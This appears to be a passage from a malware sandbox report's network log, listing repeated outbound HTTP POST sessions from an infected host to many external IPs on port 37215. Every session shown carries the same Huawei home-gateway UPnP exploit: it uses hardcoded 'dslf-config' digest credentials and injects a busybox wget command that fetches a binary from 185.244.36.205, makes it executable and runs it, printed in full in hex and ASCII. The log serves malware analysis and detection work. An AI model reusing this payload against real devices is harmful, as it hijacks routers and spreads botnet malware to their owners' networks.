                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1605192.168.2.1535956181.79.114.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645519018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1606192.168.2.155219441.246.193.2837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645541906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1607192.168.2.1560952190.22.102.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645561934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1608192.168.2.1539458102.94.210.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645593882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1609192.168.2.1558002121.163.39.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645596981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1610192.168.2.1550520222.91.202.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645612001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1611192.168.2.1553510102.99.43.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645632982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1612192.168.2.1543700186.34.190.22837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645653963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1613192.168.2.1548418157.78.171.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645669937 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1614192.168.2.1535296156.97.205.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.645708084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
